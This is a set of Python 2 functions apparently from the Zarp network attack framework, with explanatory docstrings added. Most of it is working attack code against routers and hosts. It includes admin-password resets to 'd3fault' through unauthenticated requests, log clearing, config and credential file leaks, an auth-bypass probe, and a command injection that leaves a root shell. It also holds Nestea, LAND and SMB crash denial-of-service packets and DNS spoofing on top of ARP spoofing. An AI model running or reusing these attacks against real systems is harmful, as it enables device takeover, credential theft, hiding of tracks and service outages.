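def update():
    """Run update routine: pull the latest Zarp into this git checkout.

    Refuses to run outside a git checkout or while the 'dev' branch is the
    current branch. The pull goes over HTTPS; the original used the
    unauthenticated git:// transport (which GitHub has since retired and
    which gives no integrity guarantee for code that is run straight after
    the pull). Outcome is reported through util.Msg / util.Error; returns
    None on every path.
    """
    if not util.does_file_exist('./.git/config'):
        util.Error('Not a git repo; please checkout from Github with \n\tgit clone https://github.com/hatRiot/zarp.git\n to update.')
        return
    util.Msg('Updating Zarp...')
    # second argument presumably asks init_app to return the command's output
    # rather than just run it -- confirm in util.init_app
    ret = util.init_app('git branch -a | grep \'* dev\'', True)
    # `git branch -a` marks the current branch with '*', so grep only prints
    # a line when dev is checked out; anything longer than a bare newline
    # is treated as a match
    if len(ret) > 3:
        util.Error('You appear to be on the dev branch. Please switch off dev to update.')
        return
    ret = util.init_app('git pull https://github.com/hatRiot/zarp.git HEAD', True)
    # git >= 2.17 prints 'Already up to date.'; older releases hyphenate it
    if 'Already up-to-date' in ret or 'Already up to date' in ret:
        util.Msg('Zarp already up to date.')
    elif 'fatal' in ret:
        util.Error('Error updating Zarp: %s' % ret)
    else:
        from util import version
        util.Msg('Zarp updated to version %s' % (version()))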
def initialize(self):
    """Reset the admin password on the configured Zoom device and clear its log.

    Exploit-module entry point. Asks the operator for the firmware major
    version, then issues plain-HTTP GETs against
    ``self.config['target'].value``: one password-change request (the URL
    depends on whether the answer is exactly '2') followed by a log-clear
    request. Responses are read but never checked, so the 'Done' message is
    printed whenever the requests did not raise. Any exception is reported
    through util.Error.

    Defender note: every step is an unauthenticated GET with the new
    credentials and the log-clear action in the query string, so the full
    request line is visible to any proxy, IDS or the device's own access log.
    """
    version = util.get_input('Enter Zoom version [2/3]: ')
    util.Msg('Changing admin password to \'d3fault\'...')
    # used only when the operator answers exactly '2' (name suggests 2.5)
    url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\
        'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\
        'cmdSubmit=Save+Changes' % self.config['target'].value
    # used for every other answer (name suggests 3.0)
    url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\
        'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\
        'id=3&cmdSubmit=Save+Changes' % self.config['target'].value
    url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config[
        'target'].value
    try:
        if version == '2':
            urllib.urlopen(url_25).read()
        else:
            urllib.urlopen(url_30).read()
        util.Msg("Password reset, clearing logs...")
        urllib.urlopen(url_logs).read()
        util.Msg('Done. Connect to %s with admin:d3fault' % self.config['target'].value)
    except Exception, e:
        util.Error('Unable to connect: %s' % e)
def initialize(self):
    """Run the fragment-overlap DoS against the configured target.

    Builds three scapy IP fragments sharing ``id=42`` (two flagged "more
    fragments", one carrying a fragment offset) and resends them in a loop
    until ``self.is_alive()`` reports the host down or the operator declines
    to retry. ctrl^c leaves quietly; any other exception is reported as a bad
    address. Returns None.
    """
    target = self.config['target'].value
    try:
        pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10)
        pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116)
        pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224)
        while True:
            util.Msg('DoSing %s...' % target)
            send(pkt1)
            send(pkt2)
            send(pkt3)
            if self.is_alive():
                util.Msg('Host appears to still be up.')
                try:
                    tmp = raw_input('[!] Try again? [Y/n] ')
                except Exception:
                    # end of input on stdin (or similar) ends the loop
                    break
                if 'n' in tmp.lower():
                    break
            else:
                util.Msg('Host not responding!')
                break
    except KeyboardInterrupt:
        return
    except Exception:
        util.Error('Error with given address. Could not complete DoS.')
        return
def initialize(self):
    """Run the LAND DoS: prompt for a target, confirm, then loop sending
    scapy TCP packets whose source and destination address and port are
    identical until ``self.is_alive()`` reports the host down or the
    operator declines to retry.

    Returns None. Errors while building or sending are reported through
    util.Error. NOTE(review): KeyboardInterrupt is not an Exception
    subclass, so ctrl^c propagates to the caller rather than being handled
    here.
    """
    # suppress scapy output
    conf.verb = 0
    try:
        self.target = raw_input('[!] Enter IP to DoS: ')
        tmp = raw_input('[!] LAND attack at ip %s. Is this correct? ' % self.target)
        if 'n' in tmp.lower():
            return
        while True:
            print '[!] DoSing %s...' % self.target
            send(
                IP(src=self.target, dst=self.target) / TCP(sport=134, dport=134))
            if self.is_alive():
                util.Msg('Host appears to still be up.')
                try:
                    tmp = raw_input('[!] Try again? ')
                except Exception:
                    # end of input on stdin (or similar) ends the loop
                    break
                if 'n' in tmp.lower():
                    break
            else:
                util.Msg('Host not responding!')
                break
    except Exception, j:
        util.Error('Error: %s' % j)
        return
def initialize(self):
    """Initialize the DoS: send one hard-coded SMB request to TCP/445 on
    ``self.target`` and report whether the host still answers ``is_alive()``.

    ``pkt`` is a fixed byte string: a 4-byte length prefix, the SMB header
    magic (0xFF 'S' 'M' 'B') and a constant body. It is written once and
    nothing is read back. Any exception -- a refused connection included --
    is reported as "not susceptible", so that message does not distinguish
    an unreachable host from a patched one. Returns None.
    """
    try:
        pkt = ("\x00\x00\x00\x90"
               "\xff\x53\x4d\x42"
               "\x72\x00\x00\x00"
               "\x00\x18\x53\xc8"
               "\x00\x26"
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
               "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
               "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
               "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
               "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
               "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
               "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
               "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
               "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
               "\x30\x30\x32\x00")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # presumably populates self.target, read on the next line -- confirm in get_ip
        self.get_ip()
        sock.connect((self.target, 445))
        # send() may write only part of pkt; there is no loop or sendall
        sock.send(pkt)
        sock.close()
        if self.is_alive():
            util.Msg('Host appears to be up')
        else:
            util.Msg('Host is not responding - '
                     'it is either down or rejecting our probes.')
    except Exception:
        # sock is not closed on this path; it is released with the frame
        util.Error('Remote host not susceptible to vulnerability.')
        return
def run(self):
    """Change the admin password and enable telnet on the RT-N56U at ``self.ip``.

    POSTs a urlencoded form to /start_apply.htm with the new password fields
    and ``telnetd`` set to '1'. If the device answers that another user is
    logged in, the message below is shown but no logout is attempted and
    nothing is read from the operator; the 'Done' message is printed
    regardless of what the device answered. Any exception is reported through
    util.Error. Returns None.
    """
    util.Msg(
        'Changing admin password and enabling remote telnet server...')
    try:
        data = urlencode({
            'productid': 'RT-N56U',
            'current_page': 'Advanced_System_Content.asp',
            'next_page': '',
            'next_host': '',
            'sid_list': 'LANHostConfig%3BGeneral%3B',
            'group_id': '',
            'modified': '0',
            'action_mode': '+Apply+',
            'first_time': '',
            'action_script': '',
            'preferred_lang': 'EN',
            'wl_ssid2': 'wat',
            'firmver': '1.0.7f',
            'http_passwd': 'd3fault',
            'http_passwd2': 'd3fault',
            'v_password2': 'd3fault',
            'log_ipaddr': '',
            'time_zone': 'UCT12',
            'ntp_server0': 'pool.ntp.org',
            'telnetd': '1'
        })
        response = urlopen("http://%s/start_apply.htm" % self.ip, data).read()
        if "You cannot Login unless logout another user first" in response:
            # informational only: the '[y]' prompt has no matching input or retry
            util.Msg("Another user is logged in, attempt to logout? [y] ")
        util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip)
    except Exception, e:
        util.Error('Error: %s' % e)
def initialize(self):
    """Run the Nestea fragment-overlap DoS against an IP typed by the operator.

    After confirmation, loops sending three scapy IP fragments that share
    ``id=42`` (two flagged "more fragments", one with a fragment offset)
    until ``self.is_alive()`` reports the host down or the operator declines
    to retry. Any exception is reported as a bad address (the exception
    object ``j`` is not included in the message). Returns None.
    """
    # shut scapy up
    conf.verb = 0
    try:
        self.target = raw_input('[!] Enter IP address to DoS: ')
        tmp = raw_input('[!] Nestea DoS IP %s. Is this correct? ' % self.target)
        if 'n' in tmp.lower():
            return
        while True:
            util.Msg('DoSing %s...' % self.target)
            send(
                IP(dst=self.target, id=42, flags="MF") / UDP() / ("X" * 10))
            send(IP(dst=self.target, id=42, frag=48) / ("X" * 116))
            send(
                IP(dst=self.target, id=42, flags="MF") / UDP() / ("X" * 224))
            if self.is_alive():
                util.Msg('Host appears to still be up.')
                try:
                    tmp = raw_input('[!] Try again? ')
                except Exception:
                    # end of input on stdin (or similar) ends the loop
                    break
                if 'n' in tmp.lower():
                    break
            else:
                util.Msg('Host not responding!')
                break
    except Exception, j:
        util.Error('Error with given address. Could not complete DoS.')
        return
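def parse(sysv, loader):
    """Build the command line from the loaded modules and run the selection.

    Modules can set their own CLI options. Right now we only load services
    and scanners, as these represent a majority of the 'typical' use case
    for something you want to pull off quickly.

    Args:
        sysv: unused here (argparse reads ``sys.argv`` itself); kept so
            existing callers keep working.
        loader: a Loader object with all loaded modules; its ``services``
            and ``scanner`` attributes are iterated for classes that expose
            ``cli`` (to add options) and ``which`` (the flag name).

    Every path ends in ``sys.exit(1)``; this function never returns.
    """
    parser = argparse.ArgumentParser(description=util.header())

    # add standard options
    parser.add_argument('-q', help='Generic network sniff', action='store',
                        dest='filter')
    parser.add_argument('--update', help='Update Zarp', action='store_true',
                        default=False, dest='update')

    service_group = parser.add_argument_group('Services')
    scanner_group = parser.add_argument_group('Scanners')

    # iterate through loaded modules and build the argument parser
    for service in loader.services:
        if hasattr(service, 'cli'):
            service().cli(service_group)
    for scanner in loader.scanner:
        if hasattr(scanner, 'cli'):
            scanner().cli(scanner_group)

    options = parser.parse_args()
    option_dict = vars(options)

    # first handle standard options; both are terminal
    if options.filter:
        util.Msg("Sniffing with filter [%s]...(ctrl^c to exit)" % options.filter)
        try:
            sniff(filter=options.filter, store=0, prn=lambda x: x.summary())
        except Scapy_Exception as msg:
            # must come before the generic handler: Scapy_Exception derives
            # from Exception, so the original order made this branch unreachable
            util.Error(msg)
            sys.exit(1)
        except Exception:
            util.Msg("Exiting sniffer..")
        sys.exit(1)
    elif options.update:
        update()
        sys.exit(1)

    # we can only launch one module at a time, so grab the first
    chosen = [name for name, value in option_dict.items() if value is True]
    if not chosen:
        # no module flag given: the original indexed [0] here and died with
        # an IndexError instead of telling the user what is available
        parser.print_help()
        sys.exit(1)
    usr_mod = chosen[0]

    # see what it is; one instantiation per class to read its flag name
    service_by_name = dict((cls().which, cls) for cls in loader.services)
    scanner_by_name = dict((cls().which, cls) for cls in loader.scanner)
    if usr_mod in service_by_name:
        mod = service_by_name[usr_mod]()
        util.Msg('Starting %s...' % mod.which)
        # services run in the foreground here, so let them print as they go
        mod.dump_data = True
        mod.initialize()
    elif usr_mod in scanner_by_name:
        scanner_by_name[usr_mod]().initialize()
    sys.exit(1)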
def initialize(self):
    """Initialize the DNS spoofer. This is dependent on a running ARP spoof; for now!

    Flow: pick one active 'ARP Spoof' session out of ``stream.HOUSE`` (its
    victim address and local MAC are copied to ``self.source`` /
    ``self.local_mac``), read the DNS-name regex and the answer to serve,
    confirm, store the compiled pattern in ``self.dns_spoofed_pair`` and
    start ``self.dns_sniffer`` on a thread. Returns None on every path;
    errors are reported through util.Error.
    """
    try:
        arps = None
        key = None
        if 'ARP Spoof' in stream.HOUSE:
            house = stream.HOUSE['ARP Spoof']
        else:
            util.Error('ARP spoof required!')
            return
        while True:
            stream.dump_module_sessions('ARP Spoof')
            try:
                num = int(raw_input('[number] > '))
            except TypeError:
                # NOTE(review): int() raises ValueError on non-numeric text,
                # so a bad entry is not caught here and falls through to the
                # generic handler below -- verify this is intended
                continue
            if len(house.keys()) > num:
                # Python 2: dict.keys() is an indexable list
                key = house.keys()[num]
                arps = house[key]
                self.source = arps.victim[0]
                self.local_mac = arps.local[1]
                break
            else:
                return
        dns_name = raw_input('[!] Enter regex to match DNS:\t')
        # entries are stored below under the compiled pattern, so this
        # plain-string membership test presumably never matches them
        if dns_name in self.dns_spoofed_pair:
            util.Msg('DNS is already being spoofed (%s).' %
                     (self.dns_spoofed_pair[dns_name]))
            return
        dns_spoofed = raw_input('[!] Spoof DNS entry matching %s to:\t' % (dns_name))
        tmp = raw_input(
            '[!] Spoof DNS record \'%s\' to \'%s\'. Is this correct?' % (dns_name, dns_spoofed))
        if 'n' in tmp.lower():
            return
        dns_name = re.compile(dns_name)
        self.dns_spoofed_pair[dns_name] = dns_spoofed
        self.running = True
        util.Msg('Starting DNS spoofer...')
        thread = Thread(target=self.dns_sniffer)
        thread.start()
    except KeyboardInterrupt:
        return None
    except re.error:
        util.Error('Invalid regex given.')
        return None
    except Exception, j:
        util.Error('Error: %s' % j)
        return None
def shutdown(self):
    """Stop this service: clear the running flag, close the log if one was
    being written, then report the shutdown through util.Msg / util.debug."""
    util.Msg('Shutting %s service down..' % self.which)
    was_running = self.running
    if was_running:
        self.running = False
    if was_running and self.log_data:
        # log(False, None) presumably finalises the log -- confirm in log()
        self.log(False, None)
    util.Msg("%s shutdown." % self.which)
    util.debug('%s shutdown.' % self.which)
def initialize(self):
    """Fetch /config.bin from the configured target over plain HTTP and print
    the raw response body through util.Msg.

    The body is printed as-is (no decoding or parsing); any exception is
    reported through util.Error. Returns None.
    """
    util.Msg('Fetching config from %s...' % self.config['target'].value)
    url = 'http://%s/config.bin' % self.config['target'].value
    try:
        response = urllib.urlopen(url).read()
        util.Msg(response)
    except Exception, e:
        util.Error('Error: %s' % e)
def run(self):
    """Fetch /config.bin from ``self.ip`` over plain HTTP and print the raw
    response body through util.Msg.

    The body is printed as-is (no decoding or parsing); any exception is
    reported through util.Error. Returns None.
    """
    util.Msg('Fetching config from %s...' % self.ip)
    url = 'http://%s/config.bin' % self.ip
    try:
        response = urllib.urlopen(url).read()
        util.Msg(response)
    except Exception, e:
        util.Error('Error: %s' % e)
def run(self):
    """Send a single plain-HTTP GET to /redpass.cgi on ``self.ip`` with the
    new password in the query string.

    The response is read but never inspected (``response`` is unused), so
    'Done' is printed whenever the request did not raise. Exceptions are
    reported through util.Error. Returns None.
    """
    util.Msg('Changing admin password to \'d3fault\'...')
    try:
        url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' % self.ip
        response = urllib.urlopen(url).read()
        util.Msg('Done. Admin password changed to \'d3fault\'')
    except Exception, e:
        util.Error('Error: %s' % e)
    return
def shutdown(self):
    """Shut down the module cleanly: clear the running flag, close the log if
    one was being written, then report the shutdown through util.Msg / util.debug."""
    util.Msg('Shutting \'%s\' down..' % self.which)
    was_running = self.running
    if was_running:
        self.running = False
    if was_running and self.log_data:
        # log(False) presumably finalises the log -- confirm in log()
        self.log(False)
    util.Msg("%s shutdown." % self.which)
    util.debug('%s shutdown.' % self.which)
def run(self):
    """Probe /level/<n>/exec/- paths on ``self.ip`` for n in 16..99 and report
    the first response whose body contains '200 ok'.

    ``url`` is extended on every iteration rather than rebuilt, so each
    request carries all previous segments as well. There is no exception
    handling: a connection error propagates to the caller. Returns None.
    """
    url = 'http://%s/level/' % (self.ip)
    for idx in range(16, 100):
        url += str(idx) + '/exec/-'
        response = urllib.urlopen(url).read()
        if '200 ok' in response.lower():
            util.Msg('Device vulnerable. Connect to %s for admin' % (self.ip))
            return
    util.Msg('Device not vulnerable.')
    return
def initialize(self):
    """Send a single plain-HTTP GET to /redpass.cgi on the configured target
    with the new password in the query string.

    The response is read but never inspected, so 'Done' is printed whenever
    the request did not raise. Exceptions are reported through util.Error.
    Returns None.
    """
    util.Msg('Changing admin password to \'d3fault\'...')
    try:
        url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \
            % self.config['target'].value
        urllib.urlopen(url).read()
        util.Msg('Done. Admin password changed to \'d3fault\'')
    except Exception, e:
        util.Error('Error: %s' % e)
    return
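def initialize(self):
    """Start TCP port redirection and report the configured ports.

    Calls ``self.modip()`` (defined elsewhere on the module) to install the
    redirect, marks the module running and always returns True. The status
    message is built from ``self.config['source_port']`` and
    ``self.config['dest_port']``.
    """
    util.Msg("Starting redirect_port...")
    self.modip()
    self.running = True
    # wording fixed: the original read "Redirection to from TCP port ..."
    util.Msg("Redirecting TCP port {0} to {1}...".format(
        self.config['source_port'].value, self.config['dest_port'].value))
    return True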
def run(self):
    """POST to /tools_admin.php on ``self.ip`` to add an admin user.

    The query string carries ``NO_NEED_AUTH=1``; the form body sets the user
    name and password fields (note ``admin_password`` is sent as the literal
    '******' while ``admin_password2`` holds the value). The response is read
    but never inspected (``response`` is unused), so 'Done' is printed
    whenever the request did not raise. Exceptions are reported through
    util.Error. Returns None.
    """
    util.Msg('Adding admin \'adm4n\' with password \'d3fault\'')
    url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0' % self.ip
    params = urllib.urlencode({'ACTION_POST': 1,
                               'admin_name': 'adm4n', 'admin_password': '******',
                               'admin_password2': 'd3fault'})
    try:
        response = urllib.urlopen(url, params).read()
        util.Msg('Done. Connect to %s with \'adm4n:d3fault\'' % self.ip)
    except Exception, e:
        util.Error('Failed: %s' % e)
    return
def initialize(self):
    """Probe /level/<n>/exec/- paths on the configured target for n in 16..99
    and report the first response whose body contains '200 ok'.

    ``url`` is extended on every iteration rather than rebuilt, so each
    request carries all previous segments as well. There is no exception
    handling: a connection error propagates to the caller. Returns None.
    """
    url = 'http://%s/level/' % (self.config['target'].value)
    for idx in range(16, 100):
        url += str(idx) + '/exec/-'
        response = urllib.urlopen(url).read()
        if '200 ok' in response.lower():
            util.Msg('Device vulnerable. Connect to %s for admin' % (self.config['target'].value))
            return
    util.Msg('Device not vulnerable.')
    return
def view(self):
    """Overridden Sniffer view: print one tab-separated line (ip, mac, host)
    per mapped entry in ``self.netmap`` and a host count, or a notice when
    nothing has been mapped yet."""
    if not self.netmap:
        util.Msg("No hosts yet mapped.")
        return
    for entry in self.netmap.values():
        print '\t%s\t%s\t%s' % (entry.ip, entry.mac, entry.host)
    util.Msg('\t %s hosts found.' % len(self.netmap))
def run(self):
    """Send a single plain-HTTP GET to /manage.tri on ``self.ip`` with the new
    password and management flags in the query string.

    The response is read but never inspected, so 'Done' is printed whenever
    the request did not raise. Exceptions are reported through util.Error.
    Returns None.
    """
    util.Msg('Resetting admin password to \'d3fault\'...')
    try:
        url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \
            '&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \
            '&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\
            '&layout=en' % self.ip
        urllib.urlopen(url).read()
        util.Msg('Done')
    except Exception, e:
        util.Error('Error: %s' % e)
    return
def run(self):
    """Send a single plain-HTTP GET to /tools_admin.cgi on ``self.ip`` that
    sets the admin/user passwords and enables the remote interface on 8080.

    The response is read but never inspected, so the success message is
    printed whenever the request did not raise. Exceptions are reported
    through util.Error. Returns None.
    """
    util.Msg('Changing admin password to \'d3fault\' '
             'and enabling remote admin on port 8080...')
    try:
        url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \
            '&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \
            '&hip1=*&hport=8080&hEnable=1' % self.ip
        urllib.urlopen(url).read()
        util.Msg('Admin password changed to \'d3fault\' '
                 'and interface enabled on 8080')
    except Exception, e:
        util.Error('Error: %s' % e)
def initialize(self):
    """Fetch /router-info.htm and /cgi-bin/router-info.htm from the configured
    target over plain HTTP and print both raw bodies.

    Both requests run before anything is printed, so a failure on the second
    discards the first response as well. Python 2 ``print`` statements.
    Exceptions are reported through util.Error. Returns None.
    """
    util.Msg('Fetching password from %s...' % self.config['target'].value)
    url = 'http://%s/router-info.htm' % self.config['target'].value
    url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value
    try:
        response = urllib.urlopen(url).read()
        response2 = urllib.urlopen(url2).read()
        util.Msg('First:')
        print '\t' + response
        util.Msg('Second:')
        print '\t' + response2
    except Exception, e:
        util.Error('Error: %s' % e)
def run(self):
    """Write the module's injection payload to TCP/8000 on ``self.ip``.

    Opens a raw TCP connection, writes ``self.inject``, waits three seconds,
    writes ``self.hard_save`` and closes. Both payloads are attributes set
    elsewhere on the module (not visible here). Nothing is read from the
    socket, so the final message is printed whenever both writes succeeded,
    whatever the device did with them. On an exception the socket is not
    closed explicitly. Returns None.
    """
    try:
        util.Msg('Executing command injection on %s...' % self.ip)
        sock = socket.socket()
        sock.connect((self.ip, 8000))
        sock.sendall(self.inject)
        # give the device time to act on the first write before the second
        time.sleep(3)
        util.Msg('Forcing the device to save...')
        sock.sendall(self.hard_save)
        sock.close()
        util.Msg('Reboot router for root shell on %s:5555' % (self.ip))
    except Exception, e:
        util.Error('Error: %s' % e)
def run(self):
    """Fetch /router-info.htm and /cgi-bin/router-info.htm from ``self.ip``
    over plain HTTP and print both raw bodies.

    Both requests run before anything is printed, so a failure on the second
    discards the first response as well. Python 2 ``print`` statements.
    Exceptions are reported through util.Error. Returns None.
    """
    util.Msg('Fetching password from %s...' % self.ip)
    url = 'http://%s/router-info.htm' % self.ip
    url2 = 'http://%s/cgi-bin/router-info.htm' % self.ip
    try:
        response = urllib.urlopen(url).read()
        response2 = urllib.urlopen(url2).read()
        util.Msg('First:')
        print '\t' + response
        util.Msg('Second:')
        print '\t' + response2
    except Exception, e:
        util.Error('Error: %s' % e)
def run(self):
    """GET variant of the RT-N56U password/telnet change for ``self.ip``.

    Builds one long /start_apply.htm URL with the form fields in the query
    string. The response is read but never inspected (``response`` is
    unused), so 'Done' is printed whenever the request did not raise.
    Exceptions are reported through util.Error. Returns None.

    NOTE(review): the '%3B' sequences sit inside a %-formatted literal, where
    Python reads them as a conversion spec ('%3B' is not a valid one), so
    this presumably raises ValueError before any request is sent -- verify.
    The '¤t_page' fragment looks like a mis-rendered '&current_page'
    ('&curren' is the HTML entity for '¤'; the POST variant of this module
    sends 'current_page') -- verify against the original source.
    """
    util.Msg(
        'Changing admin password and enabling remote telnet server...')
    try:
        url = 'http://%s/start_apply.htm?productid=RT-N56U¤t_page=Advanced_System_Content.asp' \
            '&next_page=&next_host=&sid_list=LANHostConfig%3BGeneral%3B&group_id=&modified=0' \
            '&action_mode=+Apply+&first_time=&action_script=&preferred_lang=EN&wl_ssid2=wat'\
            '&firmver=1.0.7f&http_passwd=d3fault&http_passwd2=d3fault&v_password2=d3fault' \
            '&log_ipaddr=&time_zone=UCT12&ntp_server0=pool.ntp.org&telnetd=1' % self.ip
        response = urllib.urlopen(url).read()
        util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip)
    except Exception, e:
        util.Error('Error: %s' % e)
def view(self):
    """Enter 'focus' on this module: turn on live output (``self.dump_data``)
    until the operator presses enter or ctrl^c, then turn it off again.

    Any other exception from raw_input (e.g. end of input) propagates with
    dump_data still set, exactly as before.
    """
    try:
        util.Msg('[enter] when finished')
        util.Msg('Dumping output from \'%s\'...' % self.which)
        self.dump_data = True
        raw_input()
    except KeyboardInterrupt:
        pass
    self.dump_data = False
    return
def initialize(self):
    """Write the module's injection payload to TCP/8000 on the configured target.

    Opens a raw TCP connection, writes ``self.inject``, waits three seconds,
    writes ``self.hard_save`` and closes. Both payloads are attributes set
    elsewhere on the module (not visible here). Nothing is read from the
    socket, so the final message is printed whenever both writes succeeded,
    whatever the device did with them. On an exception the socket is not
    closed explicitly. Returns None.
    """
    try:
        util.Msg('Executing command injection on %s...' % self.config['target'].value)
        sock = socket.socket()
        sock.connect((self.config['target'].value, 8000))
        sock.sendall(self.inject)
        # give the device time to act on the first write before the second
        sleep(3)
        util.Msg('Forcing the device to save...')
        sock.sendall(self.hard_save)
        sock.close()
        util.Msg('Reboot router for root shell on %s:5555' % (self.config['target'].value))
    except Exception, e:
        util.Error('Error: %s' % e)
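def initialize(self):
    """Put a wireless adapter into monitor mode if needed and start the AP scan.

    Returns False when airmon-ng is not installed; otherwise returns None
    once ``self.ap_scan`` finishes or the operator interrupts it with ctrl^c.
    Uses util.get_monitor_adapter / util.enable_monitor to find or create the
    monitor interface (``self.channel`` is passed when enabling one).
    """
    try:
        if not util.check_program('airmon-ng'):
            util.Error('airmon-ng not installed. Please install to continue.')
            return False
        util.Msg('(ctrl^c) when finished.')
        iface = util.get_monitor_adapter()
        if iface is None:
            util.Msg('No devices found in monitor mode. Enabling...')
            iface = util.enable_monitor(self.channel)
        util.debug('Using interface %s' % iface)
        self.ap_scan(iface)
    except (Exception, KeyboardInterrupt):
        # the original `except Exception, KeyboardInterrupt:` is Python 2's
        # `except Exception as KeyboardInterrupt`: it bound the caught
        # exception to that name and never actually caught ctrl^c
        return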
def initialize(self):
    """Start the NUD DoS listener on a background thread and return the
    module's display name.

    Sets ``self.running`` before the thread starts so ``self.listener``
    (defined elsewhere) sees it set from its first iteration.
    """
    util.Msg('Starting NUD DoS listener...')
    self.running = True
    Thread(target=self.listener).start()
    return 'NuD DoS Listener'